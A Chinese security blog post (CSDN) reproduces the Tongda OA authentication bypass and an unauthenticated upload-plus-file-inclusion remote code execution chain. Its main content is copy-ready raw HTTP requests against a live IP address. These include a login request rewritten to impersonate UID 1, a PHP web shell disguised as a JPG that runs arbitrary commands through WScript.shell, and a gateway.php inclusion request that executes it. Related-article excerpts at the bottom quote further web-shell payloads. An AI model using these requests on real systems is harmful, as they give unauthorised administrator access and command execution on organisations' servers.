通达OA前台任意用户登录漏洞+RCE漏洞复现

最新推荐文章于 2024-07-29 18:16:17 发布
最新推荐文章于 2024-07-29 18:16:17 发布
阅读量1.1w 收藏 17
点赞数 6
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szgyunyun/article/details/107104288
版权

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

用老弟的服务器搭了个靶机就不打码了用完就关了

任意用户登录:影响版本:通达OA2017,V11.X<V11.5
通达oa远程命令执行:影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版。

1、任意用户登录

1)登录处抓包
在这里插入图片描述

2)修改再发包
需修改以下三个地方:
/logincheck.php      /logincheck_code.php
删除cookie在post包中添加UID=1

在这里插入图片描述
在这里插入图片描述
3)用获取的SESSID访问/general/
在这里插入图片描述

未授权文件上传
任意文件上传漏洞 /ispirit/im/upload.php

POST /ispirit/im/upload.php HTTP/1.1
Host: 49.233.3.2:8888
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--


路径 2007/422124454.jpg

在这里插入图片描述

文件包含

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 49.233.3.2:8888
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami

在这里插入图片描述

想要搭建环境本地复现的小伙伴可以公众号回复“通达OA源码”获取下载链接。

在这里插入图片描述

god_mellon
关注
专栏目录
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
漏洞复现-通达TongdaOA系列
aming小老弟
10-03 4402
通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台2015年,通达OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑。
漏洞概念/漏洞漏洞-零开始白帽子详细教程
最新发布
2401_84915584的博客
07-29 295
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!
通达OA漏洞比getshell还要牛的system权限
hackzkaq的博客
04-20 2169
更多黑客技能 公众号:白帽子左一 作者:掌控安全-master 一位向往于任意门的白帽少年,我的奇技淫巧,让你尽可能的getshell. 今天的主角通达OA,前段时间黑产界的杀手,开始吧! 0x00 漏洞简介 CNVD:CNVD-2020-26562 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前几天通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻
typescript 调用JavaScript
前端小白的逆袭
09-24 1285
把js文件放到src/assets目录下。例如我的js文件为 remogeo.js 在src目录下的index.html中增加如下语句: 下面是我的 interactive.js中代码: function JSGoBack(tit, status) { // 返回按钮类 this._tit = tit; this._status = status; } JSGoBack.prototype = { _getValue: function () { conso..
CNVD 某雨cms前台rce复现分析
weixin_59086772的博客
06-24 549
从cnvd上看到该网站存在一定的漏洞,那跟随雨笋教育小编一起分析一下吧 安装 在官网下载最新版本1.3.0版本 //bbs.kyxscms.com/?t/1.html 使用phpstudy安装 安装说明如官网说明 http://help.kyxscms.com/935571 也可参考文章进行安装cms https://www.jianshu.com/p/b631b16934c8 前台注册用户 安装后如下,可在前台注册用户 注册成功后进行登录,利用burpsuit
通达OA 2016网络智能办公系统 handle.php SQL注入漏洞
CommputerMac的博客
10-17 1321
北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞,攻击者可利用此漏洞获取数据库管理员权限,查询数据、获取系统信息,威胁企业单位数据安全。
通达OA 身份认证绕过漏洞复现
12-12 1675
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
【Web实战】对通达OA11前台RCE的两个漏洞的分析与调优
2301_80127209的博客
11-16 389
由于已经有师傅对于如何触发反序列化的方法和代码进行了说明,这里我也就不拾人牙慧,主要谈一谈这里反序列化链的挖掘。具体的触发流程可以参考目前网上也出现了一些分析反序列化链的分析,但是目前我看到的大部分分析走的反序列化链都是通达OA自己实现了一个redis的Connection类进行攻击的poc。但是这个链,我个人认为是不够完善的。因为首先这个链设计到了socket的连接问题,可能会有一定的不稳定性和延迟。其次这条链的序列化数据比较长。那么能不能通过yii2框架的自带的链子进行更加稳定的反序列化链的触发呢。
通达OA 0day RCE漏洞复现
AzVoidSUN的博客
08-23 781
本次测试使用的是通达 OA V11.6版本。 给出下载地址,http://www.kxdw.com/soft/23114.html 下载好后,直接安装就可以。 然后打开登录界面。 登录 文件有默认密码 用某大佬写的EXP import requests target="http://192.168.0.110/" payload="<?php eval($_POST['agan']);?>" print("[*]Warning,This exploit code will DELETE
漏洞复现-通达OA通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2696
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA前台任意用户登录漏洞复现
玄道的网安博客
11-27 2142
漏洞概述 通达OA是一套国内常用的办公系统,在V11.X<V11.5和通达OA 2017版本中存在任意用户登录漏洞。攻击者在远程且未经授权的情况下,通过此漏洞可以以任意用户身份登录到系统(包括系统管理员)。 影响版本 通达OA2017、V11.X<V11.5 环境搭建 下载安装 通达OA2017 v10.13.18 crack.zip 链接:https://pan.baidu.com/s/1ARWA5uB-T5eVBjEev3dChQ 提取码:1234 一键默认安装
通达OA前台任意用户伪造登录漏洞复现
m0_48520508的博客
07-14 1754
** 0x01简介 ** 北京通达信科科技有限公司是一支以管理软件研发、实施、服务与咨询为主营业务的高科技企业,隶属于世界500强企业中国兵器工业集团公司。 2019最值得购买的OA系统排名 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 ** 0x02漏洞介绍 ** 此次安全更新修复的高危漏洞任意用户伪造,
[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
qq_51577576的博客
04-14 5031
一、漏洞编号 二、漏洞靶场 三、漏洞影响版本 四、FOFA Dork/Google Dork 五、利用漏洞风险 六、漏洞修复方案 七、漏洞利用过程
通达OA远程命令执行漏洞利用复现(exp,getshell)
Beret-81的博客
07-07 5011
通达OA远程命令执行漏洞利用复现一、漏洞描述二、环境搭建三、影响版本四、漏洞复现五、工具使用 一、漏洞描述 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 二、环境搭建 1、通达OA下载后,一键安装 下载地址:http://www.tongda2000.com/download/down.php
通达OA远程代码执行漏洞通告
爱国小白帽
03-18 2336
通达OA远程代码执行漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年03月18日, 360CERT监测发现通达OA官方在03月13日发布了针对勒索病毒事件的紧急更新。根据分析该事件是通达OA中存在的两枚漏洞(文件上传漏洞,文件包含漏洞)所导致。 通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务...
通达oa 2013 php解密,通达OA漏洞学习 - 安全先师的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39842937的博客
03-18 738
说明通达OA漏洞在去年上半年已爆出,这不趁着周末没事做,将源码下载下来进行复现学习。文件包含测试文件包含检测,payload1:ip/ispirit/interface/gateway.php?json={"url":"/general/../../mysql5/my.ini"}利用文件包含访问mysql.ini,检查是否有某些特定字符串 ,比如innodb_log_group_home_dir...
通达OA11.4漏洞复现(未授权访问)
weixin_51716781的博客
05-10 1502
通达OA11.4漏洞复现(未授权访问) 本文章仅限于渗透测试使用,如出问题与作者无关,请不要做违法操作 1:在虚拟机上安装通达OA11.4版本,查看虚拟机ip 192.168.78.159 2:访问ispirit/login_code.php 获取codeuid 如图:记住UID后面使用 3:访问/logincheck_code.php文件并使用bp抓包 4:在bp中需要修改数据:2个地方:1:修改为POST包,添加UID(注意事项:返回的包中status返回是1则成功,如果是0则失败) 5:把获取的
通达OA远程命令执行+任意用户登录漏洞复现
z.mumu的博客
12-17 1327
通达OA漏洞复现 环境搭建 https://pan.baidu.com/s/1m0MyzHVaYOfTOR3LaekVgQ 提取码:jvcj 1. 任意用户登录 影响版本:通达OA2017,V11.X<V11.5 通达oa远程命令执行 影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版 首先开启burp抓取登入页面数据包 2. 修改数据包 1. 修改路径为 `logincheck.php``为``logincheck_code.php`。 2. 删除Cook
致远oa a8漏洞复现
08-01
致远OA A8存在远程任意文件上传漏洞,攻击者可以利用该漏洞在未授权的情况下上传恶意文件并执行任意代码。漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。[1] 要复现致远OA A8漏洞,可以按照以下步骤进行操作: 1. 首先访问目标网站的/seeyon/htmlofficeservlet目录,如果访问成功,说明该网站很有可能存在漏洞。[3] 2. 如果目标网站存在漏洞,可以尝试使用爆破工具或者常见的弱口令进行登录,例如密码为123456等。如果成功登录,说明存在弱口令漏洞。[2] 3. 如果弱口令无果,可以尝试寻找历史的漏洞利用工具(exp),并进行尝试。[2] 请注意,在进行漏洞复现时,务必遵守法律法规,仅用于合法的安全研究和测试目的。未经授权的攻击行为是违法的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值